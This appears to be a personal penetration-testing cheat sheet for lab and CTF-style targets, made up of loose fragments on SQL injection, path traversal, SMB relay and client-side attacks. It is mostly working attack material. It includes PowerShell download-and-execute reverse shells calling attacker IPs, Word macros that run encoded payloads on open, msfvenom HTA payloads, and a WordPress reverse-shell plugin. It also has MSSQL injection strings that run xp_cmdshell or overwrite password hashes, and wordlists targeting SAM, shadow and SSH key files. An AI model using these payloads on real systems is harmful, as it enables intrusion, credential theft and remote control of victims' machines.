Common Exploit

SQLi

CTFish Scenario Supplement

mssql boolean time-based

Directory traversal

Client-side attack

SMB Relay

mssql error

Library-ms and .lnk

Set up the .library-ms file:

python evil-library-ms.py 192.168.45.230 > config.library-ms

set up the malicious .lnk file

powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.230:8000/powercat.ps1'); powercat -c 192.168.45.230 -p 443 -e powershell"

Copy the .lnk file to the path where the library-ms file is

impacket-smbserver share . -user test -password test -smb2support
...

set up the email body

nano body.txt
...

set up the webdav server on the path where all the prepped files are

wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root .

Set up Python webfile server, where powercat is:

python -m http.server 8000

Set up a netcat listener:

nc -lvnp 443

send the mail - make sure to use -supporess-data and -ap

sudo swaks -t jim@relia.com --from maildmz@relia.com --attach @config.library-ms --server 192.168.228.189 --body @body.txt --header "SubjectL Help Needed!" --suppress-data -ap

...
Username: maildmz@relia.com
Password: DPuBT9tGCBrTbR

To send to multiple users, simply add multiple -t <username>, e.g.:

sudo swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.50.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap

Malicious Macro

Malicious macro enumeration

Search for PDF files on the server

gobuster dir -u http://trgt1/ -w /usr/share/wordlists/dirb/common.txt -x pdf

Analyze the metadata of the file, looking for username, version information, software etc.,

exiftool test.pdf

Malicious macros 1

part 1: Setup

1: One liner modification: modify the IP address to your attacker address

IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell

2: Base64 encode payload using powershell

pwsh

$var = "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.225/powercat.ps1');powercat -c 192.168.45.225 -p 4444 -e powershell"

$bytes = [System.Text.Encoding]::Unicode.GetBytes($var)

$Enc = [convert]::ToBase64String($bytes)

$Enc

example

SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIAMgA1AC8AcABvAHcAZQByAGMAYQB0AC4AcABzADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAALQBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADIAMgA1ACAALQBwACAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGwA

Python payload splitter (replace the encoded text with your own encoded payload)

str = "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIAMgA1AC8AcABvAHcAZQByAGMAYQB0AC4AcABzADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAALQBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADIAMgA1ACAALQBwACAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGwA"

n = 50

for i in range(0, len(str), n):
        print("Str = Str + " + '"' + str[i:i+n] + '"')

example output:

python macro_splitter.py
Str = Str + "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAd"
Str = Str + "wAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAA"
Str = Str + "uAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhA"
Str = Str + "GQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADI"
Str = Str + "ALgAxADYAOAAuADQANQAuADIAMgA1AC8AcABvAHcAZQByAGMAY"
Str = Str + "QB0AC4AcABzADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAALQB"
Str = Str + "jACAAMQA5ADIALgAxADYAOAAuADQANQAuADIAMgA1ACAALQBwA"
Str = Str + "CAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGw"
Str = Str + "A"

4: Download powercat and host webserver
in the directory where powercat is downloaded

python -m http.server 80

5: Start a listener on the specified port

Part 2: Macro creation

start word document and save the document as a .doc file
Reopen the document > view > macros > view macros > create new
create malicious macro
use the following code, but replace the Str variable with your own payload (output from the macro_splitter.py file):

Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
    Str = Str + "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAd"
        Str = Str + "wAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAA"
        Str = Str + "uAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhA"
        Str = Str + "GQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADI"
        Str = Str + "ALgAxADYAOAAuADQANQAuADIAMgA1AC8AcABvAHcAZQByAGMAY"
        Str = Str + "QB0AC4AcABzADEAJwApADsAcABvAHcAZQByAGMAYQB0ACAALQB"
        Str = Str + "jACAAMQA5ADIALgAxADYAOAAuADQANQAuADIAMgA1ACAALQBwA"
        Str = Str + "CAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGw"
        Str = Str + "A"

    CreateObject("Wscript.Shell").Run Str
End Sub

save the macro and document
upload the macro file on the server where a client is expected to open it.
Make sure that part 1 is complete, and that powercat available for download from the attacker host and make sure that a listener is started

Malicious Macro 2 (Single line Macro)

generate reverse shell with msfvenom

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f exe -o revshell.exe

Base64 encode the command

pwsh

$var = "certutil.exe -f -urlcache http://192.168.37.130/revshell.exe revshell.exe; .\revshell.exe"

$bytes = [System.Text.Encoding]::Unicode.GetBytes($var)

$Enc = [convert]::ToBase64String($bytes)

$Enc

create a macro called MyMacro, use the following code and save as doc

Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
    Str = Str + "powershell.exe -nop -w hidden -e YwBlAHIAdAB1AHQAaQBsAC4AZQB4AGUAIAAtAGYAIAAtAHUAcgBsAGMAYQBjAGgAZQAgAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADMANwAuADEAMwAwAC8AcgBlAHYAcwBoAGUAbABsAC4AZQB4AGUAIAByAGUAdgBzAGgAZQBsAGwALgBlAHgAZQA7ACAALgBcAHIAZQB2AHMAaABlAGwAbAAuAGUAeABlAA=="
    CreateObject("Wscript.Shell").Run Str
End Sub

start a listener on the attacker machine on the LPORT
deliver the malicious macro to the victim

Malicious Macro 3 (Github Macro Generator (Powershell reverse shell))

git clone https://github.com/glowbase/macro_reverse_shell

generate macro code

python generate.py LHOST LPORT

Copy macro code to document and save as .doc file
Upload the malicious document

path traversal

win wl

C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SECURITY
C:\Windows\System32\config\SOFTWARE
C:\Windows\System32\config\DEFAULT
C:\Windows\NTDS\NTDS.dit
C:\Users\Administrator\NTUSER.DAT
C:\Users\<username>\NTUSER.DAT
C:\Users\<username>\AppData\Local\Microsoft\Credentials
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Recent
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
C:\Users\<username>\.ssh\id_rsa
C:\Users\<username>\.ssh\id_rsa.pub
C:\Users\<username>\.ssh\authorized_keys
C:\inetpub\wwwroot\web.config
C:\Program Files\OpenSSH\sshd_config
C:\Program Files (x86)\OpenSSH\sshd_config
C:\Windows\System32\Tasks\
C:\Windows\System32\winevt\Logs\Security.evtx
C:\Windows\System32\winevt\Logs\System.evtx
C:\Windows\System32\winevt\Logs\Application.evtx
C:\Windows\repair\SAM
C:\Windows\repair\SYSTEM
C:\Windows\repair\SOFTWARE
C:\Windows\repair\SECURITY
C:\Windows\repair\DEFAULT
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\
C:\Windows\Panther\Unattend.xml
C:\Windows\debug\NetSetup.log
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\drivers\etc\lmhosts.sam
C:\Windows\System32\drivers\etc\networks
C:\Windows\System32\drivers\etc\protocol
C:\Windows\System32\drivers\etc\services
C:\Windows\System32\config\TxR\*
C:\Windows\System32\spool\PRINTERS\
C:\Windows\System32\FxsTmp\
C:\Windows\Temp\
C:\Windows\Prefetch\
C:\inetpub\logs\LogFiles\W3SVC1\
C:\inetpub\wwwroot\web.config
C:\Windows\System32\inetsrv\config\applicationHost.config
C:\inetpub\temp\IIS Temporary Compressed Files\
C:\Windows\iis.log
C:\Windows\WindowsUpdate.log
C:\Apache\conf\httpd.conf
C:\Apache\logs\access.log
C:\Apache\logs\error.log
C:\Apache2\conf\httpd.conf
C:\Apache2\logs\access.log
C:\Apache2\logs\error.log
C:\Apache22\conf\httpd.conf
C:\Apache22\logs\access.log
C:\Apache22\logs\error.log
C:\Apache24\conf\httpd.conf
C:\Apache24\logs\access.log
C:\Apache24\logs\error.log
C:\Documents and Settings\Administrator\NTUser.dat
C:\php\php.ini
C:\php4\php.ini
C:\php5\php.ini
C:\php7\php.ini
C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache\logs\access.log
C:\Program Files (x86)\Apache Group\Apache\logs\error.log
C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache2\logs\access.log
C:\Program Files (x86)\Apache Group\Apache2\logs\error.log
c:\Program Files (x86)\php\php.ini"
C:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\Apache Group\Apache\conf\logs\access.log
C:\Program Files\Apache Group\Apache\conf\logs\error.log
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
C:\Program Files\Apache Group\Apache2\conf\logs\access.log
C:\Program Files\Apache Group\Apache2\conf\logs\error.log
C:\Program Files\FileZilla Server\FileZilla Server.xml
C:\Program Files\MySQL\my.cnf
C:\Program Files\MySQL\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.1\my.cnf
C:\Program Files\MySQL\MySQL Server 5.1\my.ini
C:\Program Files\MySQL\MySQL Server 5.5\my.cnf
C:\Program Files\MySQL\MySQL Server 5.5\my.ini
C:\Program Files\MySQL\MySQL Server 5.6\my.cnf
C:\Program Files\MySQL\MySQL Server 5.6\my.ini
C:\Program Files\MySQL\MySQL Server 5.7\my.cnf
C:\Program Files\MySQL\MySQL Server 5.7\my.ini
C:\Program Files\php\php.ini
C:\Users\Administrator\NTUser.dat
C:\Windows\debug\NetSetup.LOG
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\php.ini
C:\Windows\repair\SAM
C:\Windows\repair\system
C:\Windows\System32\config\AppEvent.evt
C:\Windows\System32\config\RegBack\SAM
C:\Windows\System32\config\RegBack\system
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SecEvent.evt
C:\Windows\System32\config\SysEvent.evt
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\winevt\Logs\Application.evtx
C:\Windows\System32\winevt\Logs\Security.evtx
C:\Windows\System32\winevt\Logs\System.evtx
C:\Windows\win.ini 
C:\xampp\apache\conf\extra\httpd-xampp.conf
C:\xampp\apache\conf\httpd.conf
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
C:\xampp\FileZillaFTP\FileZilla Server.xml
C:\xampp\MercuryMail\MERCURY.INI
C:\xampp\mysql\bin\my.ini
C:\xampp\php\php.ini
C:\xampp\security\webdav.htpasswd
C:\xampp\sendmail\sendmail.ini
C:\xampp\tomcat\conf\server.xml

for l in $(cat lfi_wordlist.txt); do curl http://$trgt1/path?param=$l; echo -e "\n---> Next request: $l\n\n"; done

curl -s http:/url/page?param=/proc/self/cmdline | tr '\000' ' ' | cut -c115- | rev | cut -c32- | rev

Error-based mssql

Webapp allows you to submit URLs or paths that are accessed by server-side processes, this can trigger network communications

webapp with UNC path

e.g. webapp, cms, etc.

info

#!/bin/bash

# This script loops through pid range 1-50,000 to look for existing process files on the target via lfi/dirtrav

# If the absolute path works, then supply the url like so: http://url/path?param=
# If it doens't work, then supply dirtrav as shown: http://$trgt1/path?param=../../../../../..
# Check if the user provided a URL as an argument
if [ -z "$1" ]; then
  echo "Usage: ./script.sh http://url/page?param="
  exit 1
fi

# Store the base URL provided by the user
url="$1"

# Loop through process IDs (PIDs)
for i in $(seq 1 50000); do 
  path="/proc/${i}/cmdline" # Path to the cmdline file of the process
  skip_start=$(( 3 * ${#path} + 1 )) # Skip the start based on the path length
  skip_end=32 # Skip the last 32 characters
  
  # Send the HTTP request and process the result
  res=$(curl -s "${url}${path}" -o- | tr '\000' ' ') 
  output=$(echo $res | cut -c ${skip_start}- | rev | cut -c ${skip_end}- | rev) 
  
  # If the output is not empty, print the PID and the command line arguments
  if [[ -n "$output" ]]; then 
    echo "${i}: ${output}" 
  fi 
done

# this works well on the back of lfienum.sh
# clean up the output - remove null pids
with open("procs.txt", 'r') as f:
	for l in f.readlines():
		if "cmdlinewindow" in l.split('/')[-1]:
			pass
		else:
			if "window.close()\n" in l:
				try: print(l.split(':')[0], "\b:\t", l.split('cmdline')[-1].strip("windows.close()\n"))
				except: print(l)
			else:
				try: print(l.split(':')[0], "\b:\t", l)
				except: print(l)

Update record

error-based SQL injection, the approach involves crafting queries that deliberately cause errors when certain conditions are true. By observing the errors or the absence of errors in the response, you can infer information about the database structure or data.

guess table names: user, users etc.

find column names

enum no of cols

enum table name

Detailed Breakdown

Line 1:

'; IF ((select count(name) from sys.tables where name = 'users')=1) WAITFOR DELAY '0:0:10';--

select count(name): This retrieves the count of tables with the name 'users' from the sys.tables view.
- name: This is the name of the table in the database. sys.tables holds metadata about each table, and one of its columns is name, representing the table name.
sys.tables: A system view in SQL Server that contains a row for each table in the current database. It holds information such as the table's name, its ID, creation date, etc.
where name = 'users': This condition filters the result to only the table named 'users'. If this table exists, the query returns 1.
IF ((select count(name) ...) = 1): The outer IF checks if the count equals 1, meaning the table 'users' exists.
WAITFOR DELAY '0:0:10': If the condition is true, the server waits for 10 seconds. This tells the attacker that the users table exists based on the observed delay.
';--: The ';-- terminates the current query and comments out any remaining part of the original query, preventing it from executing.

Line 2:

'; IF ((select count(c.name) from sys.columns c, sys.tables t where c.object_id = t.object_id and t.name = 'users' )>2) WAITFOR DELAY '0:0:10';--

sys.columns c: sys.columns is a system view that holds information about each column in every table of the database. Here, c is an alias for this view, allowing it to be referred to as c in the query. The important field here is c.name, which represents the name of each column.
sys.tables t: sys.tables is again used to access metadata about tables, and t is an alias for it.
c.object_id = t.object_id: object_id is a unique identifier for each object (table, view, etc.) in SQL Server. Here, the query joins sys.columns (c) and sys.tables (t) using object_id to link columns to their respective tables.
- Explanation: This join ensures that the query only fetches columns that belong to the 'users' table.
t.name = 'users': This restricts the results to columns in the users table.
select count(c.name): This counts the number of columns in the users table.
IF ... > 2: The IF statement checks if the users table has more than 2 columns. If true, the server waits for 10 seconds.
- Purpose: This helps the attacker infer the number of columns in the users table by observing the delays.

Line 3:

'; IF ((select count(c.name) from sys.columns c, sys.tables t where c.object_id = t.object_id and t.name = 'users' )>3) WAITFOR DELAY '0:0:10';--

Same logic as line 2, but it checks if the users table has more than 3 columns.
- Purpose: The attacker is progressively gathering more information about the table structure, confirming how many columns exist by introducing incremental checks.

Line 4:

'; IF ((select count(c.name) from sys.columns c, sys.tables t where c.object_id = t.object_id and t.name = 'users' and c.name = 'username')=1) WAITFOR DELAY '0:0:10';--

c.name = 'username': This condition checks if there is a column named 'username' in the users table.
IF ... = 1: If this column exists, the query causes a 10-second delay.
- Purpose: The attacker is verifying the presence of a specific column (username), a critical piece of information for later stages of the attack.

Line 5:

'; IF ((select count(c.name) from sys.columns c, sys.tables t where c.object_id = t.object_id and t.name = 'users' and c.name like 'pass%')=1) WAITFOR DELAY '0:0:10';--

c.name like 'pass%': This checks if any column in the users table starts with 'pass'.
- The attacker is likely trying to locate a password-related column (e.g., password, password_hash, etc.).
- The % is a wildcard character, matching any sequence of characters that follow 'pass'.
IF ... = 1: If a column starting with 'pass' exists, the query causes a 10-second delay.

Line 6:

'; IF ((select count(c.name) from sys.columns c, sys.tables t where c.object_id = t.object_id and t.name = 'users' and c.name like 'passw%')=1) WAITFOR DELAY '0:0:10';--

c.name like 'passw%': This further narrows the search to columns starting with 'passw'. The attacker is refining the search for the password column.
IF ... = 1: If a column starting with 'passw' exists, the query triggers a 10-second delay.

Lines 7-10:

Each subsequent line refines the search for a password-related column by progressively matching longer strings, moving from 'passwo%' (line 7) to 'password_%' (line 10). Each step of this process is designed to pinpoint a column likely containing password data.

password: By this point, the attacker is trying to identify a column named exactly password or with a similar name like password_hash.
Delays: Each matching condition results in a 10-second delay, which confirms whether the target column exists.

Line 11:

'; update users set password_hash = 'tacos123' where username = 'butch';--

update users set password_hash = 'tacos123' where username = 'butch':
- This is an UPDATE statement that modifies the users table.
- set password_hash = 'tacos123': This changes the password_hash of the user 'butch' to 'tacos123'.
- where username = 'butch': The WHERE clause ensures that only the row corresponding to the username 'butch' is updated.
- If successful, the attacker can now log in as 'butch' with the password 'tacos123'.

Key Points of the Attack:

Stealthy Information Gathering: The attacker incrementally gathers information about the database's structure using time-based delays. By observing how long the system waits, the attacker confirms the existence of specific tables and columns.
Focus on Critical Columns: The attack centers on identifying the username and password columns in the users table.
Privilege Escalation: Once enough information is gathered, the attacker updates the password for a specific user, potentially gaining unauthorized access to the system.

mssql-time based blind

MS-SQL Methods

NetNTLMv2 Challenge Response

sudo responder -I tun0 -v -A

'; exec xp_dirtree "\\<attacker_ip>\test";--

Check if you have a user accounts hash. If it's a machine account it's unlikely to be crackable

XP_CMDShell

';EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;--

touch test.txt
python -m http.server 80

';EXEC xp_cmdshell 'certutil -urlcache -f http://192.168.45.230/test.txt';--

python pwsh_encoded_revshell.py $trgt1 4444

nc -lvnp 4444

';EXEC xp_cmdshell 'powershell -nop -w hidden -e JABjAGwAaQBlAG4Ad...';--

Remote Mouse 3.008
/uploads folder - download the strange .exe file

exiftool the file

Company Name/File Description/Product Name/Product Version

Searchsploit remote mouse 3.008

Client-Side Attack (Office Macros)
/uploads folder
"only .doc file allowed" or something similar when uploading

Information Disclosure - FTP - Diskboss CVE (#path2)

Webapp recon
website says: "add a .hta file to FTP with the user: 'mildred' password:'Ab0min4tion' "
Create a malicious .hta file
msfvenom -p windows/shell_reverse_tcp -f hta-psh -o evil.hta lport=443 -lhost=tun0
Upload this file to FTP with the credentials provided

nc -lvnp 443

ftp $trgt1
put evil.hta

Web appllication
Webapp Tech Version
Webapp CVE
php, aspx, jsp etc.,
Webshell
Webshell to Reverseshell

Information Disclosure - FTP - Diskboss CVE (#path2)

Webapp recon
User+domain Discovery
Add domain name (DC) to /etc/hosts
e.g. 10.10.1.200 oscp.lab
Password Spray FTP using user, if that doesn't work, then try user@oscp.lab
hydra -l user -P rockyou.txt ftp://ms01
FTP as user
download: "file.zip"
try to extract the zip file - but in this scenario, it doesn't work
Perform file. exiftool on "file.zip"
look through metadata information - look for names, versions etc., - we find that the name is diskboss v 8.8.x
Searchsploit with the version number
Remote buffer overflow
Modify the target and add custom shellcode

Web application

Host name - curl - msoscp.lab
Add relevant hostnames to /etc/hosts
Subdomain discovery 403 restrcition: dev.msoscp.lab
FTP anonymous login
download dev_instruction.txt
Custom header required
curl dev.msoscp.lab with custom header
Custom header extension on browser
Login page
Authentication Bypass: SQL Injection vulnerability
Usernames revealed - no file upload
FTP Password Spray using user hydra -l user -P rockyou.txt ftp://ms01
While that's running, continue looking through the webapp - look for potential entries, clues etc.
Password discovered
download zip file
also, since winrm is an open port on the machine, try the username and password against the it with evil-winrm
Zip file contains a pcap and exe file
run file and exiftool against both files
- Run the executable in a Windows VM
- open the pcap file using wireshark
  pcap file contains a log that displays user credentials
Try the new credentials against winrm

Example Scenarios

File Upload feature on port 80
NTLMv2 Theft via ODT file

Privilege Escalation
Using MySQL to write files on the filesystem

select load_file('C:\\test\\nc.exe') into dumpfile 'C:\\test\\shell.exe';

determine time delay

'; update users set password_hash = 'tacos123' where username = 'butch';--

plain pwd

'; IF ((select count(username) from users where username = 'butch' and password_hash = '<value>')=1) WAITFOR DELAY '0:0:10';--

use burp or similar to bruteforce usernames

confirm overwrite

Using like function select: u,us,use,user,usern...

Prerequisites:

SMB Signing must be disabled
Situation where you can control a machine to point to your smb relay server. This could be over a webapp, command execution etc.
Requires the targeted account to be able to authenticate to the targeted system, using it's Windows Auth
For example, it's not uncommon that the local Administrator accounts across computers in a domain are set up with the same password

In this example, we have a tunnel set up with two listeners. listener 8080 points to a webserver where we have powercat - this will be used for the download on the other end. And the listener on port 443 which is used by us to catch a shell. 172.16.120.243 would probably be ms01, while 172.16.12-.254 would be the target - ms02 that we wish to authenticate to and execute the powershell on.

$var="IEX(New-Object System.Net.WebClient).DownloadString('http://172.16.120.243:8080/powercat.ps1');powercat -c 172.16.120.243 -p 443 -e powershell"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($var)
$Enc
$Enc = [convert]::ToBase64String($bytes)
PS C:\Users\aslam> $Enc
SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA3ADIALgAxADYALgAxADIAMAAuADIANAAzADoAOAAwADgAMAAvAHAAbwB3AGUAcgBjAGEAdAAuAHAAcwAxACcAKQA7AHAAbwB3AGUAcgBjAGEAdAAgAC0AYwAgADEANwAyAC4AMQA2AC4AMQAyADAALgAyADQAMwAgAC0AcAAgADQANAAzACAALQBlACAAcABvAHcAZQByAHMAaABlAGwAbAA=

sudo impacket-ntlmrelayx --no-http-server -smb2support -t 172.16.120.254 -c "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA3ADIALgAxADYALgAxADIAMAAuADIANAAzADoAOAAwADgAMAAvAHAAbwB3AGUAcgBjAGEAdAAuAHAAcwAxACcAKQA7AHAAbwB3AGUAcgBjAGEAdAAgAC0AYwAgADEANwAyAC4AMQA2AC4AMQAyADAALgAyADQAMwAgAC0AcAAgADQANAAzACAALQBlACAAcABvAHcAZQByAHMAaABlAGwAbAA="

\\remote_ip\test

Webshell File Upload Vulnerability

File upload function is detected
Test which files can be uploaded
Test bypasses of the files
Extensions, php5, phar etc.,
Padding characters, nullbytes etc.,
Mime-type/content-type
Magic Bytes etc.
See if the uploaded files appear in the uploads path

Use weevely to create a password protected php webshell php - upload the file - then connect to that webshell with weevely

Web application
Wordpress website
Wordpress plugin enumeration
Unauthenticated SQL Injection vulnerability on Plugin
Password hash revealed
Crack the hash with john
Wordpress admin panel access
Wordpress admin to reverse shell via plugin upload
Access as webservice user

Wordpress Admin to Reverse Shell

Install php plugin

Save the following code as rev_plugin.php

<?php

/**
* Plugin Name: Reverse Shell Plugin
* Plugin URI:
* Description: Reverse Shell Plugin
* Version: 1.0
* Author: Vince Matteo
* Author URI: http://www.sevenlayers.com
*/

exec("/bin/bash -c 'bash -i >& /dev/tcp/10.11.55.202/4444 0>&1'");
?>

Create a zip file with the php file saved inside it

zip rev.zip rev_plugin.php

Upload zip file as plugin in wordpress
-“Attachments/Pasted image 20231212182459.png” could not be found.
Click upload plugin
“Attachments/Pasted image 20231212182753.png” could not be found.

Browse and select the Zip created that contains the reverse shell
“Attachments/Pasted image 20231212182843.png” could not be found.

“Attachments/Pasted image 20231212182914.png” could not be found.

Click install now to upload it
“Attachments/Pasted image 20231212183005.png” could not be found.

Next set up your listener and then activate the plugin (hopefully this works!)
“Attachments/Pasted image 20231212183450.png” could not be found.

'; update users set password_hash = '<hash>' where username = 'butch';--

echo -n 'password' | md5sum; echo -n 'password' | sha1sum; echo -n 'password' | sha256sum

only if you know all column names & have permission

brt w like func

guessing/userlist

search for user related column names:
user, users, username, usernames, user_info etc.

exact match check. Replace <table_name> and 1

Using like function select: u,us,use,user,usern...

exact match search for pwd, pass, passwd, password, pass_hash, hash, password_hash etc.

'; IF EXISTS (SELECT 1 FROM sys.columns col JOIN sys.tables tab ON col.object_id = tab.object_id WHERE tab.name = 'users' AND col.name like 'u%') WAITFOR DELAY '0:0:10';--

sudo responder -I tun0 -v -A

\\<remote_ip>\test

'; IF ((select count(c.name) from sys.columns c, sys.tables t where c.object_id = t.object_id and t.name = 'users' and c.name = 'username')=1) WAITFOR DELAY '0:0:10';--

if you have user columns

pwds/passwords

<remote_ip>

common hash

only change the password if the alternative methods don't work, as password reusage may exist in a pentest/ctf or similar

Relay Attacks

insert row

overwrite pwd/hash value

enumerate users

' AND 1=(SELECT CASE WHEN (SELECT COUNT(*) FROM sys.columns WHERE object_id = OBJECT_ID('users')) > 2 THEN 1 ELSE (SELECT 1/0) END)--

' AND 1=(SELECT CASE WHEN EXISTS (SELECT * FROM sys.columns WHERE object_id = OBJECT_ID('users') AND name = 'username') THEN 1 ELSE (SELECT 1/0) END)--

' AND 1=(SELECT CASE WHEN EXISTS (SELECT * FROM sys.tables WHERE name = 'users') THEN 1 ELSE (SELECT 1/0) END)--

check for column names

check if table exists

check the column count

use a condition that generates an error if the data does not meet your criteria

retrieve info from columns

ntlmrelayx

cmd

web application includes features where users can interact with external URL

url/unc input parameter

check for remote server connectivity via webapp

webapp file uploads or network paths as part of its configuration

ssrf

'; IF ((select count(name) from sys.tables where name = 'users')=1) WAITFOR DELAY '0:0:10';--

scenarios example

responder

TIP: Time-based Burp Check
After running burp intruder for name enumeration on the DB (for time-based attacks):
select: Columns > Response reveived

https://portswigger.net/web-security/sql-injection/cheat-sheet

Hacking.Files/Hacking.Notes/Hacking.2Initial Breach > SQL Injection Methodology

https://portswigger.net/web-security/sql-injection/cheat-sheet

SQLi Authentication

' OR 1=1;--

' OR '1

' OR 1 -- -

" OR "" = "

Using like function
select: u, us, use, user etc.

custom wl

use wordlists shown above

processes

std check

ssh keys

consider unknown services Backdoor

general useful

Use: iis_log_lfi.py to generate the wordlist. Adjust the dates if needed

C:\inetpub\logs\LogFiles\W3SVC1\u_ex240830.log
C:\inetpub\logs\LogFiles\W3SVC1\u_ex240831.log
C:\inetpub\logs\LogFiles\W3SVC1\u_ex240901.log

/etc/passwd
/root/.bash_history
/home/<user>/.bash_history
/etc/hosts
/etc/shadow

id_rsa
id_dsa
id_ecdsa
id_ed25519
private_key
ssh_private_key
mykey
my_key
server_key
key        
ssh_key              
deploy_key        
backup_id_rsa     
backup_id_dsa 
backup_id_ecdsa  
backup_id_ed25519  
temp_id_rsa
temp_id_dsa  
temp_id_ecdsa
temp_id_ed25519

/var/www/html/wp-config.php
/srv/www/wordpress/wp-config.php
/etc/apache2/apache2.conf
/etc/apache2/sites-available/000-default.conf
/etc/httpd/httpd.conf
/var/log/apache2/error.log
/var/log/apache2/access.log
/etc/nginx/nginx.conf
/etc/nginx/sites-available/default
/etc/nginx/sites-enabled/default
/usr/local/nginx/conf/nginx.conf
/var/log/nginx/access.log
/var/log/nginx/error.log
/usr/local/nginx/logs/error.log
/usr/local/nginx/logs/access.log
/var/log/mysql/error.log
/var/log/auth.log
/var/log/secure
/var/log/syslog
/var/log/messages
/var/lib/jenkins/config.xml
/var/lib/jenkins/credentials.xml
/var/log/jenkins/jenkins.log
/var/www/html/configuration.php
/srv/www/joomla/configuration.php
/var/log/joomla/error.php
/var/log/apache2/joomla_error.log
/var/log/apache2/joomla_error.log
/srv/www/drupal/sites/default/settings.php
/var/www/html/sites/default/settings.local.php
/var/log/drupal-watchdog.log
/var/log/apache2/drupal_error.log
/var/www/html/web.config
/umbraco/config/umbracoSettings.config
/App_Data/Logs/UmbracoTraceLog.txt
/var/www/glpi/config/config_db.php

save each wordlist to a file and then loop through

/proc/self/cmdline

lin wl

ssh key filename

config & logs

running processes

auto check: lfienum

https://github.com/0bfxgh0st/lfienum

'; IF (1=1) WAITFOR DELAY '0:0:10';--

'; IF EXISTS (SELECT 1 FROM sys.tables WHERE name LIKE 'u%') WAITFOR DELAY '0:0:10';--

'; IF ((select count(c.name) from sys.columns c, sys.tables t where c.object_id = t.object_id and t.name = 'users' )>2) WAITFOR DELAY '0:0:10';--

'; IF ((SELECT COUNT(*) FROM sys.columns WHERE object_id = OBJECT_ID('<table_name>')) = 1) WAITFOR DELAY '0:0:10';--

users/usernames

'; IF ((select count(c.name) from sys.columns c, sys.tables t where c.object_id = t.object_id and t.name = 'users' and c.name = 'pass')=1) WAITFOR DELAY '0:0:10';--

